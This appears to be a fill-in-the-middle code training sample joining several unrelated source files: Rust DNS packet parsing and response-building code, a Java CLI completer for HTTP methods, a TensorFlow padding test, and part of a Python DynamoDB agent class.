if name_len > DNS_MAX_HOSTNAME_LEN {
info!(
"Name too long: {} bytes > {}",
name_len,
DNS_MAX_HOSTNAME_LEN
);
return Err("Name too long");
}
offset += label_len + 1;
if label_len == 0 {
break;
}
labels_count += 1;
}
Ok((offset, labels_count))
}
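// A minimal illustration (hypothetical packet, not part of the original
// source) of the wire format `skip_name` walks: length-prefixed labels
// terminated by a zero byte, with 0xc0-prefixed two-byte pointers ending
// the walk early.
#[cfg(test)]
mod skip_name_example {
    use super::*;

    #[test]
    fn walks_uncompressed_name() {
        // 12-byte header, then "www.example.com" encoded as
        // \x03www\x07example\x03com\x00, then qtype/qclass.
        let mut packet = vec![0u8; DNS_OFFSET_QUESTION];
        packet.extend_from_slice(b"\x03www\x07example\x03com\x00\x00\x01\x00\x01");
        let (offset, labels_count) = skip_name(&packet, DNS_OFFSET_QUESTION).unwrap();
        assert_eq!(labels_count, 3);
        assert_eq!(offset, DNS_OFFSET_QUESTION + 17);
    }
}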
#[derive(Debug)]
struct EDNS0 {
payload_size: u16,
dnssec: bool,
}
fn parse_edns0(packet: &[u8]) -> Option<EDNS0> {
debug_assert_eq!(qdcount(packet), 1);
debug_assert_eq!(ancount(packet), 0);
debug_assert_eq!(nscount(packet), 0);
if arcount(packet) != 1 {
return None;
}
let packet_len = packet.len();
let mut offset = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset) => offset.0,
Err(_) => return None,
};
if offset >= packet_len - DNS_QTYPE_PLUS_QCLASS_LEN {
return None;
}
offset += DNS_QTYPE_PLUS_QCLASS_LEN;
offset = match skip_name(packet, offset) {
Ok(offset) => offset.0,
Err(_) => return None,
};
if offset >= packet_len - DNS_OFFSET_EDNS_PAYLOAD_SIZE - 2 {
return None;
}
debug_assert!(DNS_OFFSET_EDNS_PAYLOAD_SIZE > DNS_OFFSET_EDNS_TYPE);
if packet[offset + DNS_OFFSET_EDNS_TYPE] != (DNS_TYPE_OPT >> 8) as u8 ||
packet[offset + DNS_OFFSET_EDNS_TYPE + 1] != DNS_TYPE_OPT as u8
{
return None;<|fim▁hole|> let mut payload_size = ((packet[offset + DNS_OFFSET_EDNS_PAYLOAD_SIZE] as u16) << 8) |
packet[offset + DNS_OFFSET_EDNS_PAYLOAD_SIZE + 1] as u16;
if offset >= packet_len - DNS_OFFSET_EDNS_DO {
return None;
}
let dnssec = packet[offset + DNS_OFFSET_EDNS_DO] & 0x80 == 0x80;
if payload_size < DNS_UDP_NOEDNS0_MAX_SIZE as u16 {
payload_size = DNS_UDP_NOEDNS0_MAX_SIZE as u16;
}
Some(EDNS0 {
payload_size: payload_size,
dnssec: dnssec,
})
}
impl fmt::Display for NormalizedQuestion {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
let qname = &self.qname;
let qname_len = qname.len();
let mut res = Vec::with_capacity(qname_len);
let mut offset: usize = 0;
while offset < qname_len {
let label_len = qname[offset] as usize;
            assert_ne!(label_len, 0);
if label_len & 0xc0 == 0xc0 {
res.push(b'&');
offset += 2;
continue;
}
offset += 1;
res.extend_from_slice(&qname[offset..offset + label_len]);
res.push(b'.');
offset += label_len;
}
let qname_str = String::from_utf8_lossy(&res);
write!(f, "[{}]\t{} {}", qname_str, self.qtype, self.qclass)
}
}
impl NormalizedQuestion {
pub fn key(&self) -> NormalizedQuestionKey {
let dnssec = if self.qname.is_empty() {
true
} else {
self.dnssec
};
NormalizedQuestionKey {
dnssec: dnssec,
qname_lc: qname_lc(&self.qname),
qtype: self.qtype,
qclass: self.qclass,
}
}
pub fn minimal(&self) -> NormalizedQuestionMinimal {
NormalizedQuestionMinimal {
qname: self.qname.clone(),
tid: self.tid,
qtype: self.qtype,
qclass: self.qclass,
}
}
}
pub fn qname_lc(qname: &[u8]) -> Vec<u8> {
let qname_len = qname.len();
let mut res = vec![0u8; qname_len];
let mut offset: usize = 0;
while offset < qname_len {
res[offset] = qname[offset];
let label_len = qname[offset] as usize;
assert_ne!(label_len, 0);
if label_len & 0xc0 == 0xc0 {
offset += 2;
continue;
}
offset += 1;
for i in 0..label_len {
res[offset + i] = match qname[offset + i] {
c @ 0x41...0x5a => c | 0x20,
c => c,
};
}
offset += label_len;
}
res
}
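// A hypothetical sketch of the normalization above: only the ASCII bytes
// 'A'..'Z' are OR'ed with 0x20, so label lengths and non-letter bytes
// survive untouched while the name compares case-insensitively.
#[cfg(test)]
mod qname_lc_example {
    use super::*;

    #[test]
    fn lowercases_ascii_labels() {
        let qname = b"\x03WwW\x07ExAmPlE\x03CoM".to_vec();
        assert_eq!(qname_lc(&qname), b"\x03www\x07example\x03com".to_vec());
    }
}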
pub fn qname_shift(qname: &[u8]) -> Option<&[u8]> {
let qname_len = qname.len();
if qname_len < 2 {
return None;
}
let label_len = qname[0];
if label_len == 0 || label_len & 0xc0 == 0xc0 || 2 + label_len as usize > qname_len {
return None;
}
Some(&qname[1 + label_len as usize..])
}
pub fn normalize(packet: &[u8], is_question: bool) -> Result<NormalizedQuestion, &'static str> {
let packet_len = packet.len();
if packet_len < DNS_QUERY_MIN_SIZE {
return Err("Short packet");
}
if is_question == qr(packet) {
return Err("Invalid flags");
}
if qdcount(packet) != 1 {
return Err("Unsupported number of questions");
}
let question = match question(packet) {
Ok(question) => question,
Err(e) => return Err(e),
};
let mut normalized_question = NormalizedQuestion {
tid: tid(packet),
flags: flags(packet),
payload_size: DNS_UDP_NOEDNS0_MAX_SIZE as u16,
labels_count: question.labels_count,
dnssec: false,
qname: question.qname.to_owned(),
qtype: question.qtype,
qclass: question.qclass,
};
if is_question {
if ancount(packet) != 0 || nscount(packet) != 0 {
return Err("Extra sections found in a question");
}
if let Some(edns0) = parse_edns0(packet) {
normalized_question.dnssec = edns0.dnssec;
if edns0.payload_size > DNS_UDP_NOEDNS0_MAX_SIZE as u16 {
normalized_question.payload_size = edns0.payload_size;
}
}
} else {
let qname_len = normalized_question.qname.len();
if qname_len == 0 || normalized_question.qname[qname_len - 1] & 0x20 == 0 {
normalized_question.dnssec = true;
}
}
Ok(normalized_question)
}
pub fn min_ttl(
packet: &[u8],
min_ttl: u32,
max_ttl: u32,
failure_ttl: u32,
) -> Result<u32, &'static str> {
if qdcount(packet) != 1 {
return Err("Unsupported number of questions");
}
let packet_len = packet.len();
if packet_len <= DNS_OFFSET_QUESTION {
return Err("Short packet");
}
let mut offset = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
assert!(offset > DNS_OFFSET_QUESTION);
if 4 > packet_len - offset {
return Err("Short packet");
}
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
if qclass != DNS_CLASS_IN {
return Err("Unsupported query class");
}
offset += 4;
let ancount = ancount(packet);
let nscount = nscount(packet);
let arcount = arcount(packet);
let rrcount = ancount + nscount + arcount;
let mut found_min_ttl = if rrcount > 0 { max_ttl } else { failure_ttl };
for _ in 0..rrcount {
offset = match skip_name(packet, offset) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
if 10 > packet_len - offset {
return Err("Short packet");
}
let qtype = (packet[offset] as u16) << 8 | packet[offset + 1] as u16;
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
let ttl = (packet[offset + 4] as u32) << 24 | (packet[offset + 5] as u32) << 16 |
(packet[offset + 6] as u32) << 8 | packet[offset + 7] as u32;
let rdlen = ((packet[offset + 8] as u16) << 8 | packet[offset + 9] as u16) as usize;
offset += 10;
if qtype != DNS_TYPE_OPT {
if qclass != DNS_CLASS_IN {
warn!("Unexpected rdata class: {}", qclass);
}
if ttl < found_min_ttl {
found_min_ttl = ttl;
}
}
if rdlen > packet_len - offset {
return Err("Record length would exceed packet length");
}
offset += rdlen;
}
if found_min_ttl < min_ttl {
found_min_ttl = min_ttl;
}
if offset != packet_len {
return Err("Garbage after packet");
}
Ok(found_min_ttl)
}
pub fn set_ttl(packet: &mut [u8], ttl: u32) -> Result<(), &'static str> {
if qdcount(packet) != 1 {
return Err("Unsupported number of questions");
}
let packet_len = packet.len();
if packet_len <= DNS_OFFSET_QUESTION {
return Err("Short packet");
}
let mut offset = match skip_name(packet, DNS_OFFSET_QUESTION) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
assert!(offset > DNS_OFFSET_QUESTION);
if 4 > packet_len - offset {
return Err("Short packet");
}
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
if qclass != DNS_CLASS_IN {
return Err("Unsupported query class");
}
offset += 4;
let ancount = ancount(packet);
let nscount = nscount(packet);
let arcount = arcount(packet);
for _ in 0..(ancount + nscount + arcount) {
offset = match skip_name(packet, offset) {
Ok(offset) => offset.0,
Err(e) => return Err(e),
};
if 10 > packet_len - offset {
return Err("Short packet");
}
let qtype = (packet[offset] as u16) << 8 | packet[offset + 1] as u16;
let qclass = (packet[offset + 2] as u16) << 8 | packet[offset + 3] as u16;
if qtype != DNS_TYPE_OPT || qclass != DNS_CLASS_IN {
packet[offset + 4] = (ttl >> 24) as u8;
packet[offset + 5] = (ttl >> 16) as u8;
packet[offset + 6] = (ttl >> 8) as u8;
packet[offset + 7] = ttl as u8;
}
let rdlen = ((packet[offset + 8] as u16) << 8 | packet[offset + 9] as u16) as usize;
offset += 10;
if rdlen > packet_len - offset {
return Err("Record length would exceed packet length");
}
offset += rdlen;
}
if offset != packet_len {
return Err("Garbage after packet");
}
Ok(())
}
pub fn build_tc_packet(normalized_question: &NormalizedQuestion) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_tc(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_servfail_packet(
normalized_question: &NormalizedQuestion,
) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_rcode(&mut packet, DNS_RCODE_SERVFAIL);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_refused_packet(
normalized_question: &NormalizedQuestion,
) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_rcode(&mut packet, DNS_RCODE_REFUSED);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_nxdomain_packet(
normalized_question: &NormalizedQuestion,
) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_rcode(&mut packet, DNS_RCODE_NXDOMAIN);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
Ok(packet)
}
pub fn build_any_packet(
normalized_question: &NormalizedQuestion,
ttl: u32,
) -> Result<Vec<u8>, &'static str> {
let hinfo_cpu = b"draft-ietf-dnsop-refuse-any";
let hinfo_rdata = b"";
let rdata_len = 1 + hinfo_cpu.len() + 1 + hinfo_rdata.len();
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
set_ancount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
packet.push(0xc0 + (DNS_HEADER_SIZE >> 8) as u8);
packet.push(DNS_HEADER_SIZE as u8);
packet.push((DNS_TYPE_HINFO >> 8) as u8);
packet.push(DNS_TYPE_HINFO as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
packet.push((ttl >> 24) as u8);
packet.push((ttl >> 16) as u8);
packet.push((ttl >> 8) as u8);
packet.push(ttl as u8);
packet.push((rdata_len >> 8) as u8);
packet.push(rdata_len as u8);
packet.push(hinfo_cpu.len() as u8);
packet.extend_from_slice(hinfo_cpu);
packet.push(hinfo_rdata.len() as u8);
packet.extend_from_slice(hinfo_rdata);
Ok(packet)
}
pub fn build_version_packet(
normalized_question: &NormalizedQuestion,
ttl: u32,
) -> Result<Vec<u8>, &'static str> {
let txt = b"EdgeDNS";
let rdata_len = 1 + txt.len();
let capacity = DNS_HEADER_SIZE + normalized_question.qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, normalized_question.tid);
set_aa(&mut packet, true);
set_qr(&mut packet, true);
set_qdcount(&mut packet, 1);
set_ancount(&mut packet, 1);
packet.extend_from_slice(&normalized_question.qname);
packet.push(0);
debug_assert_eq!(normalized_question.qtype, DNS_TYPE_TXT);
debug_assert_eq!(normalized_question.qclass, DNS_CLASS_CH);
packet.push((DNS_TYPE_TXT >> 8) as u8);
packet.push(DNS_TYPE_TXT as u8);
packet.push((DNS_CLASS_CH >> 8) as u8);
packet.push(DNS_CLASS_CH as u8);
packet.push(0xc0 + (DNS_HEADER_SIZE >> 8) as u8);
packet.push(DNS_HEADER_SIZE as u8);
packet.push((DNS_TYPE_TXT >> 8) as u8);
packet.push(DNS_TYPE_TXT as u8);
packet.push((DNS_CLASS_CH >> 8) as u8);
packet.push(DNS_CLASS_CH as u8);
packet.push((ttl >> 24) as u8);
packet.push((ttl >> 16) as u8);
packet.push((ttl >> 8) as u8);
packet.push(ttl as u8);
packet.push((rdata_len >> 8) as u8);
packet.push(rdata_len as u8);
packet.push(txt.len() as u8);
packet.extend_from_slice(txt);
Ok(packet)
}
pub fn build_probe_packet(qname: &[u8]) -> Result<Vec<u8>, &'static str> {
let capacity = DNS_HEADER_SIZE + qname.len() + 1;
let mut packet = Vec::with_capacity(capacity);
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, random());
set_rd(&mut packet, true);
set_qdcount(&mut packet, 1);
packet.extend_from_slice(qname);
let qtype = DNS_TYPE_SOA;
let qclass = DNS_CLASS_IN;
packet.push((qtype >> 8) as u8);
packet.push(qtype as u8);
packet.push((qclass >> 8) as u8);
packet.push(qclass as u8);
Ok(packet)
}
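// A hypothetical layout sketch for the probe built above: a 12-byte header,
// the caller-encoded qname (including its trailing zero byte), then 4 bytes
// of qtype/qclass (SOA, IN), with RD set and a random tid.
#[cfg(test)]
mod probe_packet_example {
    use super::*;

    #[test]
    fn probe_packet_layout() {
        let qname = b"\x07example\x03com\x00";
        let packet = build_probe_packet(qname).unwrap();
        assert_eq!(packet.len(), DNS_HEADER_SIZE + qname.len() + 4);
        assert_eq!(qdcount(&packet), 1);
        assert!(rd(&packet));
    }
}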
pub fn build_query_packet(
normalized_question: &NormalizedQuestion,
force_dnssec: bool,
) -> Result<(Vec<u8>, NormalizedQuestionMinimal), &'static str> {
let mut qname = qname_lc(&normalized_question.qname);
let qname_len = qname.len();
let force_dnssec = if qname_len == 0 { true } else { force_dnssec };
if force_dnssec || normalized_question.dnssec {
if qname_len > 0 {
qname[qname_len - 1] &= !0x20;
}
}
let capacity = DNS_HEADER_SIZE + qname_len + 1 + 15;
let mut packet = Vec::with_capacity(capacity);
let tid: u16 = random();
packet.extend_from_slice(&[0u8; DNS_HEADER_SIZE]);
set_tid(&mut packet, tid);
set_rd(&mut packet, true);
set_qdcount(&mut packet, 1);
set_arcount(&mut packet, 1);
packet.extend_from_slice(&qname);
packet.push(0);
packet.push((normalized_question.qtype >> 8) as u8);
packet.push(normalized_question.qtype as u8);
packet.push((normalized_question.qclass >> 8) as u8);
packet.push(normalized_question.qclass as u8);
packet.push(0); // EDNS name
packet.push((DNS_TYPE_OPT >> 8) as u8);
packet.push(DNS_TYPE_OPT as u8);
packet.push((DNS_MAX_PACKET_SIZE >> 8) as u8);
packet.push(DNS_MAX_PACKET_SIZE as u8);
let edns_rcode_rdlen = if force_dnssec || normalized_question.dnssec {
[0u8, 0u8, 0x80u8, 0u8, 0u8, 0u8]
} else {
[0u8; 6]
};
packet.extend_from_slice(&edns_rcode_rdlen); // EDNS rcode + rdlen
let normalized_question_minimal = NormalizedQuestionMinimal {
qname: qname,
tid: tid,
qtype: normalized_question.qtype,
qclass: normalized_question.qclass,
};
Ok((packet, normalized_question_minimal))
}
pub fn qname_encode(name: &str) -> Result<Vec<u8>, &'static str> {
let mut encoded = Vec::with_capacity(name.len() + 1);
let mut final_dot = false;
for part in name.split('.') {
if final_dot {
return Err("Invalid name: unexpected dots");
}
let len = part.len();
if len > 0x3f {
return Err("Invalid name: label too long (> 63 characters)");
} else if len == 0 {
if name.len() == 1 {
break;
}
final_dot = true;
}
encoded.push(len as u8);
encoded.extend_from_slice(part.as_bytes());
}
if !final_dot {
encoded.push(0);
}
Ok(encoded)
}<|fim▁end|> | } |
<|file_name|>HttpMethodPrefixCompleter.java<|end_file_name|><|fim▁begin|>/*
* Copyright © 2014 Cask Data, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License
*/
package co.cask.cdap.cli.completer.element;
import co.cask.cdap.api.service.http.ServiceHttpEndpoint;
import co.cask.cdap.cli.CLIConfig;
import co.cask.cdap.cli.ProgramIdArgument;
import co.cask.cdap.cli.util.ArgumentParser;
import co.cask.cdap.client.ServiceClient;
import co.cask.cdap.common.NotFoundException;
import co.cask.cdap.common.UnauthorizedException;
import co.cask.cdap.proto.Id;
import co.cask.common.cli.completers.PrefixCompleter;
import com.google.common.collect.Lists;
import java.io.IOException;
import java.util.Collection;
import java.util.Collections;<|fim▁hole|>
/**
* Prefix completer for Http methods.
*/
public class HttpMethodPrefixCompleter extends PrefixCompleter {
private static final String PROGRAM_ID = "programId";
private static final String PATTERN = String.format("call service <%s>", PROGRAM_ID);
private final ServiceClient serviceClient;
private final EndpointCompleter completer;
private final CLIConfig cliConfig;
public HttpMethodPrefixCompleter(final ServiceClient serviceClient, final CLIConfig cliConfig,
String prefix, EndpointCompleter completer) {
super(prefix, completer);
this.cliConfig = cliConfig;
this.serviceClient = serviceClient;
this.completer = completer;
}
@Override
public int complete(String buffer, int cursor, List<CharSequence> candidates) {
Map<String, String> arguments = ArgumentParser.getArguments(buffer, PATTERN);
ProgramIdArgument programIdArgument = ArgumentParser.parseProgramId(arguments.get(PROGRAM_ID));
if (programIdArgument != null) {
Id.Service service = Id.Service.from(cliConfig.getCurrentNamespace(),
programIdArgument.getAppId(), programIdArgument.getProgramId());
completer.setEndpoints(getMethods(service));
} else {
completer.setEndpoints(Collections.<String>emptyList());
}
return super.complete(buffer, cursor, candidates);
}
public Collection<String> getMethods(Id.Service serviceId) {
Collection<String> httpMethods = Lists.newArrayList();
try {
for (ServiceHttpEndpoint endpoint : serviceClient.getEndpoints(serviceId)) {
String method = endpoint.getMethod();
if (!httpMethods.contains(method)) {
httpMethods.add(method);
}
}
} catch (IOException | UnauthorizedException | NotFoundException ignored) {
}
return httpMethods;
}
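  // Hypothetical usage sketch (identifiers assumed for illustration, not
  // taken from this repository): while completing
  //   call service <app-id.service-id> <method>
  // the completer parses the program id out of the buffer, fetches that
  // service's endpoints, and offers their distinct HTTP methods:
  //
  //   HttpMethodPrefixCompleter completer = new HttpMethodPrefixCompleter(
  //       serviceClient, cliConfig, "call service <programId>", endpointCompleter);
  //   completer.complete("call service purchase.CatalogLookup ", cursor, candidates);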
}<|fim▁end|> | import java.util.List;
import java.util.Map; |
<|file_name|>pad_op_test.py<|end_file_name|><|fim▁begin|># Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.nn_ops.Pad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
class PadOpTest(tf.test.TestCase):
def _npPad(self, inp, paddings, mode):
return np.pad(inp, paddings, mode=mode.lower())
def testNpPad(self):
self.assertAllEqual(
np.array([[0, 0, 0, 0, 0, 0],
[0, 3, 3, 0, 0, 0],
[0, 4, 4, 0, 0, 0],
[0, 5, 5, 0, 0, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]]),
self._npPad(
np.array([[3, 3], [4, 4], [5, 5]]),
[[1, 2], [1, 3]],
mode="constant"))
self.assertAllEqual(
np.array([[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0],
[4, 3, 4, 9, 4, 3],
[1, 0, 1, 2, 1, 0]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="reflect"))
self.assertAllEqual(
np.array([[0, 0, 1, 2, 2, 1],
[0, 0, 1, 2, 2, 1],
[3, 3, 4, 9, 9, 4],
[3, 3, 4, 9, 9, 4]]),
self._npPad(
np.array([[0, 1, 2], [3, 4, 9]]),
[[1, 1], [1, 2]],
mode="symmetric"))
def _testPad(self, np_inputs, paddings, mode, use_gpu=False):
np_val = self._npPad(np_inputs, paddings, mode=mode)
with self.test_session(use_gpu=use_gpu):
tf_val = tf.pad(np_inputs, paddings, mode=mode)
out = tf_val.eval()
self.assertAllEqual(np_val, out)
self.assertShapeEqual(np_val, tf_val)
def _testGradient(self, x, a, mode):
with self.test_session():
inx = tf.convert_to_tensor(x)<|fim▁hole|> # Expected y's shape to be:
ys = list(np.array(x.shape) + np.sum(np.array(a), axis=1))
jacob_t, jacob_n = tf.test.compute_gradient(inx,
xs,
y,
ys,
x_init_value=x)
self.assertAllClose(jacob_t, jacob_n, rtol=1e-5, atol=1e-5)
def _testAll(self, np_inputs, paddings):
for mode in ("CONSTANT", "REFLECT", "SYMMETRIC"):
self._testPad(np_inputs, paddings, mode=mode, use_gpu=False)
self._testPad(np_inputs, paddings, mode=mode, use_gpu=True)
if np_inputs.dtype == np.float32:
self._testGradient(np_inputs, paddings, mode=mode)
def testInputDims(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2, 1, 1, 1, 1]),
tf.reshape([1, 2], shape=[1, 2]))
def testPaddingsDim(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2], shape=[2]))
def testPaddingsDim2(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2], shape=[2, 1]))
def testPaddingsDim3(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2], shape=[1, 2]))
def testPaddingsDim4(self):
with self.test_session():
with self.assertRaises(ValueError):
tf.pad(
tf.reshape([1, 2], shape=[1, 2]),
tf.reshape([1, 2, 3, 4, 5, 6], shape=[3, 2]))
def testPaddingsNonNegative(self):
with self.test_session():
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
tf.pad(
tf.constant([1], shape=[1]),
tf.constant([-1, 0], shape=[1, 2]))
def testPaddingsNonNegative2(self):
with self.test_session():
with self.assertRaisesRegexp(ValueError, "must be non-negative"):
tf.pad(
tf.constant([1], shape=[1]),
tf.constant([-1, 0], shape=[1, 2]))
def testPaddingsMaximum(self):
with self.test_session():
with self.assertRaises(Exception):
tf.pad(
tf.constant([1], shape=[2]),
tf.constant([2, 0], shape=[1, 2]),
mode="REFLECT").eval()
with self.assertRaises(Exception):
tf.pad(
tf.constant([1], shape=[2]),
tf.constant([0, 3], shape=[1, 2]),
mode="SYMMETRIC").eval()
def testIntTypes(self):
# TODO(touts): Figure out why the padding tests do not work on GPU
# for int types and rank > 2.
for t in [np.int32, np.int64]:
self._testAll((np.random.rand(4, 4, 3) * 100).astype(t),
[[1, 0], [2, 3], [0, 2]])
def testFloatTypes(self):
for t in [np.float32, np.float64, np.complex64]:
self._testAll(np.random.rand(2, 5).astype(t),
[[1, 0], [2, 0]])
def testShapeFunctionEdgeCases(self):
# Unknown paddings shape.
inp = tf.constant(0.0, shape=[4, 4, 4, 4])
padded = tf.pad(inp, tf.placeholder(tf.int32))
self.assertEqual([None, None, None, None], padded.get_shape().as_list())
# Unknown input shape.
inp = tf.placeholder(tf.float32)
padded = tf.pad(inp, [[2, 2], [2, 2]])
self.assertEqual([None, None], padded.get_shape().as_list())
# Unknown input and paddings shape.
inp = tf.placeholder(tf.float32)
padded = tf.pad(inp, tf.placeholder(tf.int32))
self.assertAllEqual(None, padded.get_shape().ndims)
def testScalars(self):
paddings = np.zeros((0, 2), dtype=np.int32)
inp = np.asarray(7)
for use_gpu in False, True:
with self.test_session(use_gpu=use_gpu):
tf_val = tf.pad(inp, paddings)
out = tf_val.eval()
self.assertAllEqual(inp, out)
self.assertShapeEqual(inp, tf_val)
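# Illustrative sketch (not part of the original tests; assumes the
# TF1-style Session API used elsewhere in this file) of the shape rule
# applied in _testGradient above: paddings is an [n, 2] list of
# (before, after) counts per dimension, so the padded shape is
# x.shape + paddings.sum(axis=1).
def _pad_shape_sketch():
  x = np.ones((2, 3), dtype=np.float32)
  paddings = [[1, 0], [2, 2]]
  with tf.Session():
    y = tf.pad(x, paddings).eval()
  assert y.shape == (3, 7)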
if __name__ == "__main__":
tf.test.main()<|fim▁end|> | xs = list(x.shape)
ina = tf.convert_to_tensor(a)
y = tf.pad(inx, ina, mode=mode) |
<|file_name|>db.py<|end_file_name|><|fim▁begin|>import logging
import json
import time
from collections import defaultdict
from flotilla.model import FlotillaServiceRevision, FlotillaUnit, \
GLOBAL_ASSIGNMENT, GLOBAL_ASSIGNMENT_SHARDS
from Crypto.Cipher import AES
logger = logging.getLogger('flotilla')
class FlotillaAgentDynamo(object):
"""Database interaction for worker/agent component.
Required table permissions:
    status:
    - PutItem
assignments:
- BatchGetItem
revisions:
- BatchGetItem
units:
- BatchGetItem
"""
def __init__(self, instance_id, service_name, status_table,
assignments_table, revisions_table, units_table, kms):
self._id = instance_id
global_shard = hash(instance_id) % GLOBAL_ASSIGNMENT_SHARDS
self._global_id = '%s_%d' % (GLOBAL_ASSIGNMENT, global_shard)
self._service = service_name
self._status = status_table
self._assignments = assignments_table
self._revisions = revisions_table
self._units = units_table
self._kms = kms
def store_status(self, unit_status):
"""Store unit status.
:param unit_status Unit statuses.
"""
logger.debug('Storing status as %s...', self._id)
data = dict(unit_status)
data['service'] = self._service
data['instance_id'] = self._id
data['status_time'] = time.time()
self._status.put_item(data=data, overwrite=True)
logger.info('Stored status of %s units as %s.', len(unit_status),
self._id)
def get_assignments(self):
assignments = self._assignments.batch_get([
{'instance_id': self._id}, {'instance_id': self._global_id}])
assigned_revisions = [assignment['assignment'] for assignment in
assignments]
return sorted(assigned_revisions)
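    # Illustrative sketch (not part of the original class; values are
    # hypothetical): how an instance id maps onto one of the sharded
    # "global" assignment rows fetched by get_assignments above.
    @staticmethod
    def _global_shard_sketch(instance_id):
        shard = hash(instance_id) % GLOBAL_ASSIGNMENT_SHARDS
        return '%s_%d' % (GLOBAL_ASSIGNMENT, shard)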
def get_units(self, assigned_revisions):
"""
Get currently assigned FlotillaUnits.
:param assigned_revisions: Assigned revisions
:return: Revisions.
"""
# Fetch every revision and index units:
revisions = {}
unit_revisions = defaultdict(list)
revision_keys = [{'rev_hash': assigned_revision}
for assigned_revision in set(assigned_revisions)]
for revision_item in self._revisions.batch_get(revision_keys):
rev_hash = revision_item['rev_hash']
revision = FlotillaServiceRevision(label=revision_item['label'])
revisions[rev_hash] = revision
for unit in revision_item['units']:
